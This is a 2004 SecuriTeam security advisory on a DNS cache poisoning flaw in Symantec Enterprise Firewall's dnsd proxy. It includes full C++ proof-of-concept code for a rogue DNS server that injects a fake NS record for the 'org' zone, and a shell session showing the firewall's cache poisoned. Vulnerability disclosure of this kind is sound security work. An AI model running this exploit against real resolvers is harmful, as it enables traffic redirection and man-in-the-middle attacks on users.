Date: 21 Jun 2004 11:59:42 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [UNIX] Symantec Enterprise Firewall DNSD Cache Poisoning Vulnerability
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Symantec Enterprise Firewall DNSD Cache Poisoning Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://enterprisesecurity.symantec.com/products/products.cfm?ProductID=47>; Symantec Enterprise Firewall, designed to provide proactive, enterprise-class network and application-level protection, enables fast and secure connectivity with the Internet.
Symantec Enterprise Firewall dnsd proxy is vulnerable to cache poisoning
attacks by an attacker acting as a caching nameserver.
DETAILS
Vulnerable Systems:
* Symantec Enterprise Firewall dnsd proxy, versions 8 and earlier
It is possible to inject false entries in the server's cache and make a
false DNS server look like authoritative of a zone, when it is not. Once
this information is loaded to the cache, any request to a subdomain of
that zone will be submitted to the false DNS. To achieve that, a malicious
DNS server responds to a query, but not necessarily with an answer, fills
in the authoritative and additional records section of the DNS response
message with information that did not necessarily relate to the answer. As
we can see, DNSD SEF proxy accepts this response and does not perform any
necessary checks to assure that the this information is correct or even
related in some way to the answer (i.e., that the responding server had
appropriate authority over those records).
fryxar has found that some public DNS servers use this vulnerability to
redirect unregistered domains to their sites. It also could be used to do
Man-In-The-Middle / Denial of Services / Social Engineering Attacks.
Vendor Status:
Symantec's response as follows:
"Symantec engineers are reviewing the posted information. If it is
validated we will respond accordingly."
Proof of Concept Code:
Solaris 9 / SEF 8 and SEF 7.0.4: In an authoritative nameserver (e.g.
afraid.org dynamic DNS that supports domain NS delegation), compile and
run the following small DNS server:
// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc
#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG
// Server include file
#include <poslib/server/server.h>
// For signal handling
#include <stdlib.h>
#include <signal.h>
char *dyndomain;
DnsMessage *my_handle_query(pending_query *query);
void cleanup(int sig) {
?// close down the server system
?pos_setquitflag();
}
int main(int argc, char **argv) {
_addr a;
try {
/* get command-line arguments */
? if (argc != 2 ) {
printf( "Usage: %s [domainname]\n", argv[0] );
return 1;
} else {
dyndomain = argv[1];
txt_to_addr(&a, "any");
}
poslib_config_init();
/* bring up posadis */
servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));
// use the posadis logging system
pos_log(context_none, log_info, "Proof of concept DNS server starting
up...");
// set signal handlers
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
// set query function
handle_query = my_handle_query;
// run server
posserver_run();
} catch (PException p) {
printf("Fatal exception: %s\n", p.message);
return 1;
}
return 0;
}
/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
DnsMessage *a = new DnsMessage();
DnsQuestion q;
DnsRR rr;
/* set a as an answer to the query */
a->ID = query->message->ID;
a->RD = query->message->RD;
a->RA = false;
if (query->message->questions.begin() ==
query->message->questions.end()) {
/* query did not contain question */
a->RCODE = RCODE_QUERYERR;
return a;
}
q = *query->message->questions.begin();
a->questions.push_back(q);
a->QR = true;
pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(),
str_qtype(q.QTYPE).c_str());
if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); //
Anything...
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->answers.push_back(rr);
rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->authority.push_back(rr);
rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->additional.push_back(rr);
} else {
/* we don't want this */
a->RCODE = RCODE_SRVFAIL;
}
return a;
}
Example of an Exploit Session:
fryxar.afraid.org # ./poc fryxar.afraid.org
and now, in your SEF Firewall:
firewall # kill `ps -ef | awk '/[d]nsd/ { print $2 }'` # Cleaning the
cache
firewall # nslookup afraid.org 127.0.0.1 # Caching org. NS Server:
localhost
Address: 127.0.0.1
Non-authoritative answer:
Name: afraid.org
Addresses: 69.42.89.56, 69.42.89.53, 69.42.89.55, 69.42.89.54
firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump
firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
172775 NS TLD2.ULTRADNS.NET.
172775 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.
firewall # nslookup fryxar.afraid.org 127.0.0.1 # Domain owned by my
poisoned DNS
Server: localhost
Address: 127.0.0.1
Non-authoritative answer:
Name: fryxar.afraid.org
Address: 200.200.200.200
firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump
firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
3567 NS fakedns.com. <- Ooohh!
3567 NS TLD2.ULTRADNS.NET.
3567 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.
And now SEF "thinks" that fakedns.com server is an authoritative
nameserver of the ".org" domain, controlled by fryxar.afraid.org DNS
server that is only authoritative for the fryxar.afraid.org domain.
ADDITIONAL INFORMATION
The information has been provided by <mailto:fryxar@datafull.com.> fryxar.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
